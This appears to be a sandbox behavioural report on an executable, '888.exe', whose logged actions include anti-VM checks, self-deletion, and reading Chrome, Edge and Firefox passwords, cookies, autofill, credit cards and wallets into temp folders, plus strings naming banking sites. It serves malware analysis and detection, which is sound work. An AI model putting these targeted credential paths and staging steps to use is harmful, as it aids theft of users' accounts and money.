Source: C:\Users\user\Desktop\888.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: cryptnet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\888.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: 888.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: 888.exe | Static file information: File size 4885504 > 1048576
Source: 888.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x358200
Source: 888.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x130200
Source: 888.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: 888.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: WINLOA~1.PDBwinload_prod.pdb | source: 888.exe, 00000000.00000003.1719343963.0000000001357000.00000004.00000020.00020000.00000000.sdmp

              Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\888.exe | File deleted: c:\users\user\desktop\888.exe
Source: C:\Users\user\Desktop\888.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (59 identical entries for this process)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2402
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1815
              Source: C:\Users\user\Desktop\888.exe | API coverage: 7.7 %
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5832 | Thread sleep count: 2402 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5916 | Thread sleep count: 1815 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6136 | Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5992 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\Desktop\888.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
              Source: C:\Users\user\Desktop\888.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\
              Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\
              Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\
              Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\
              Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\
              Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696501413o
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696501413j
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696501413x
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696501413t
              Source: 888.exe, 00000000.00000003.1849050689.000000000131F000.00000004.00000020.00020000.00000000.sdmp, 888.exe, 00000000.00000003.1849152849.000000000132D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive userers - HKVMware20,11696501413]
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696501413s
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696501413
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696501413
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696501413t
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: interactiveuserers.comVMware20,11696501413
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696501413f
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696501413
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\888.exe | Code function: 0_2_00A71220 RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap, | 0_2_00A71220
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
              Source: C:\Users\user\Desktop\888.exe | Memory allocated: page read and write | page guard
              Source: C:\Users\user\Desktop\888.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Desktop VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Desktop\888.exe VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Desktop\BNAGMGSPLO.pdf VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Desktop\EEGWXUHVUG.png VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Desktop\EOWRVPQCCS.mp3 VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Desktop\Excel.lnk VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Desktop\GRXZDKKVDB.jpg VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Desktop\NVWZAPQSQL.mp3 VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Desktop\NVWZAPQSQL.pdf VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.png VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Desktop\PIVFAGEAAV.docx VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Desktop\PIVFAGEAAV.xlsx VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Desktop\SQSJKEBWDT.jpg VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Desktop\SQSJKEBWDT.xlsx VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Desktop\SUAVTZKNFL.docx VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Documents VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Documents\BNAGMGSPLO.pdf VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Documents\desktop.ini VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Documents\EEGWXUHVUG.png VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Documents\EOWRVPQCCS.mp3 VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Documents\GRXZDKKVDB.jpg VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Documents\NVWZAPQSQL.mp3 VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Documents\NVWZAPQSQL.pdf VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Documents\PALRGUCVEH.png VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Documents\PIVFAGEAAV.docx VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Documents\PIVFAGEAAV.xlsx VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Documents\SQSJKEBWDT.jpg VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Documents\SQSJKEBWDT.xlsx VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\Documents\SUAVTZKNFL.docx VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\sensitive-files.zip VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Autofill VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Cookies VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\CreditCards VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Downloads VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\History VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\screen1.png VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\sensitive-files.zip VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\user_info.txt VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Passwords\Chrome_Default.txt VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Passwords\Edge_Default.txt VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Passwords\Firefox_qnq0haq7.default.txt VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\History\Chrome_Default.txt VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\History\Edge_Default.txt VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\History\Firefox_qnq0haq7.default.txt VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Downloads\Chrome_Default.txt VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Downloads\Edge_Default.txt VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Downloads\Firefox_qnq0haq7.default.txt VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\CreditCards\Chrome_Default.txt VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\CreditCards\Edge_Default.txt VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\CreditCards\Firefox_Firefox.txt VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Cookies\Chrome_Default_Network.txt VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Cookies\Edge_Default_Network.txt VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Cookies\Firefox_qnq0haq7.default_Network.txt VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Autofill\Chrome_Default.txt VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Autofill\Edge_Default.txt VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Autofill\Firefox_qnq0haq7.default.txt VolumeInformation
              Source: C:\Users\user\Desktop\888.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Wallets VolumeInformation
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\History\Chrome_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\History\Chrome_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\History\Edge_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\History\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Downloads\Chrome_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Downloads\Chrome_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Downloads\Edge_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Downloads\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\CreditCards\Chrome_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\CreditCards\Edge_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\CreditCards\Edge_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\CreditCards\Firefox_Firefox.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Cookies\Chrome_Default_Network.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Cookies\Chrome_Default_Network.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Cookies\Edge_Default_Network.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Cookies\Firefox_qnq0haq7.default_Network.txt VolumeInformationJump to behavior
